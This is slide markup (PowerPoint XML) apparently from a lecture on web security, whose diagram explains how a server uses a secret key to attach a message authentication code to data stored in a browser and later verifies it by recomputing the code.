                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0663F39F-FCCB-0A49-AD67-6B171E206CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3170239" y="4064691"/>
            <a:ext cx="968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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBE7E4C-240C-4648-B7AA-FA2AD71045F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3605213" y="2267641"/>
            <a:ext cx="2452687" cy="1371600"/>
            <a:chOff x="1311" y="1248"/>
            <a:chExt cx="1545" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24604" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{664BDF5B-437D-A243-BB50-A534EE3593BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1551" y="1584"/>
              <a:ext cx="192" cy="168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="hlink"/>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24605" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37DC860-15C5-2641-A0E8-7907670FF0F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1311" y="1440"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 240"/>
                <a:gd name="T1" fmla="*/ 0 h 240"/>
                <a:gd name="T2" fmla="*/ 96 w 240"/>
                <a:gd name="T3" fmla="*/ 192 h 240"/>
                <a:gd name="T4" fmla="*/ 240 w 240"/>
                <a:gd name="T5" fmla="*/ 240 h 240"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 240"/>
                <a:gd name="T10" fmla="*/ 0 h 240"/>
                <a:gd name="T11" fmla="*/ 240 w 240"/>
                <a:gd name="T12" fmla="*/ 240 h 240"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="240" h="240">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="76"/>
                    <a:pt x="56" y="152"/>
                    <a:pt x="96" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="232"/>
                    <a:pt x="216" y="232"/>
                    <a:pt x="240" y="240"/>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06" name="Freeform 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A82CAED-8118-E443-AEB1-1051B2420BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1407" y="1752"/>
              <a:ext cx="246" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 246"/>
                <a:gd name="T1" fmla="*/ 360 h 360"/>
                <a:gd name="T2" fmla="*/ 114 w 246"/>
                <a:gd name="T3" fmla="*/ 234 h 360"/>
                <a:gd name="T4" fmla="*/ 246 w 246"/>
                <a:gd name="T5" fmla="*/ 0 h 360"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 246"/>
                <a:gd name="T10" fmla="*/ 0 h 360"/>
                <a:gd name="T11" fmla="*/ 246 w 246"/>
                <a:gd name="T12" fmla="*/ 360 h 360"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="246" h="360">
                  <a:moveTo>
                    <a:pt x="0" y="360"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="339"/>
                    <a:pt x="73" y="294"/>
                    <a:pt x="114" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="174"/>
                    <a:pt x="218" y="49"/>
                    <a:pt x="246" y="0"/>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07" name="Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF086A20-A762-2441-8AE3-7C1173B179D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1503" y="1248"/>
              <a:ext cx="1353" cy="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80000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>MAC</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>(message authentication code)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD56458C-6CE3-2343-B3F0-0E67E38E6FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3182041"/>
            <a:ext cx="3429000" cy="1181100"/>
            <a:chOff x="1632" y="1824"/>
            <a:chExt cx="2160" cy="744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24600" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2EA417-E224-6541-9689-2D8386F3FEDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="1824"/>
              <a:ext cx="192" cy="562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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24601" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602C39F9-B0C3-B24A-851A-B34549A6F11B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2400"/>
              <a:ext cx="192" cy="168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="hlink"/>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24602" name="Text Box 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9646A10F-F5FA-4142-B7F1-EACC0EE68FA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1968"/>
              <a:ext cx="170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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>message, MAC(KEY,message)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24603" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B8329C-48EF-4B4F-AAFC-BE41527080E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1651" y="2207"/>
              <a:ext cx="1872" cy="1"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6ED0028-2DDE-814A-A400-2A854AE6C04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7534276" y="2658167"/>
            <a:ext cx="1514475" cy="1704975"/>
            <a:chOff x="3786" y="1494"/>
            <a:chExt cx="954" cy="1074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24597" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E87158-F81E-D14B-B402-1EDBC60C6E99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4127" y="1494"/>
              <a:ext cx="613" cy="888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 613 w 613"/>
                <a:gd name="T1" fmla="*/ 0 h 888"/>
                <a:gd name="T2" fmla="*/ 97 w 613"/>
                <a:gd name="T3" fmla="*/ 438 h 888"/>
                <a:gd name="T4" fmla="*/ 31 w 613"/>
                <a:gd name="T5" fmla="*/ 888 h 888"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 613"/>
                <a:gd name="T10" fmla="*/ 0 h 888"/>
                <a:gd name="T11" fmla="*/ 613 w 613"/>
                <a:gd name="T12" fmla="*/ 888 h 888"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="613" h="888">
                  <a:moveTo>
                    <a:pt x="613" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="73"/>
                    <a:pt x="194" y="290"/>
                    <a:pt x="97" y="438"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="586"/>
                    <a:pt x="45" y="794"/>
                    <a:pt x="31" y="888"/>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8" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123FBC29-CF46-DB43-9775-CF26D558F1C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3786" y="2239"/>
              <a:ext cx="276" cy="131"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 276"/>
                <a:gd name="T1" fmla="*/ 29 h 131"/>
                <a:gd name="T2" fmla="*/ 210 w 276"/>
                <a:gd name="T3" fmla="*/ 17 h 131"/>
                <a:gd name="T4" fmla="*/ 276 w 276"/>
                <a:gd name="T5" fmla="*/ 131 h 131"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 276"/>
                <a:gd name="T10" fmla="*/ 0 h 131"/>
                <a:gd name="T11" fmla="*/ 276 w 276"/>
                <a:gd name="T12" fmla="*/ 131 h 131"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="276" h="131">
                  <a:moveTo>
                    <a:pt x="0" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="27"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="210" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="34"/>
                    <a:pt x="262" y="107"/>
                    <a:pt x="276" y="131"/>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9" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBE7093-7653-E649-B496-F043784914FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="2400"/>
              <a:ext cx="192" cy="168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCCCC"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4E6066-003C-B743-8B83-A36D0C2AFC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="3912293"/>
            <a:ext cx="3883025" cy="1474788"/>
            <a:chOff x="3024" y="2284"/>
            <a:chExt cx="2446" cy="929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24594" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7159C51-154B-9A49-86D2-690091C140F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="2380"/>
              <a:ext cx="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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24595" name="Text Box 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28083B2-385D-C547-BEF8-4B29B7A6E3E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3807" y="2284"/>
              <a:ext cx="17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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24596" name="AutoShape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70184483-2238-394E-8CD3-94C47EE7FA5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3024" y="2845"/>
              <a:ext cx="2446" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20625"/>
                <a:gd name="adj2" fmla="val -98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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Recomputes MAC and verifies whether it is</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>equal to the MAC attached to the message</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C81AEC-4812-C94D-AC4E-5A9651C65250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MAC: Message Authentication Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468845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54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37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4" descr="j0139031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72525085-4633-8245-8D20-168AE5621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9860" y="3073429"/>
            <a:ext cx="781034" cy="107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6" descr="PE03749_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01018B4A-AFB2-7843-A66D-C9FE0B50D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04288" y="3029641"/>
            <a:ext cx="71596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 Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78FA9C2-19E9-174E-ABAF-F7338D968CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057316" y="4132308"/>
            <a:ext cx="1210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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB10668-9AED-AF49-8239-BB1FCE5E86C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8980489" y="4096442"/>
            <a:ext cx="98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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24586" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14112A76-8892-9E4B-BD08-E30EDFC06DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8994776" y="2381941"/>
            <a:ext cx="1759083" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13046"/>
              <a:gd name="adj2" fmla="val 114421"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEn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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SERVER KEY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F4F1F1-ACED-9746-9BA8-C0F28F862CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3475038" y="3237605"/>
            <a:ext cx="304800" cy="892175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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24589" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0663F39F-FCCB-0A49-AD67-6B171E206CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5466556" y="1814627"/>
            <a:ext cx="17803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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Information to store in browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24604" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{664BDF5B-437D-A243-BB50-A534EE3593BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7235623" y="2722121"/>
            <a:ext cx="304800" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD56458C-6CE3-2343-B3F0-0E67E38E6FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
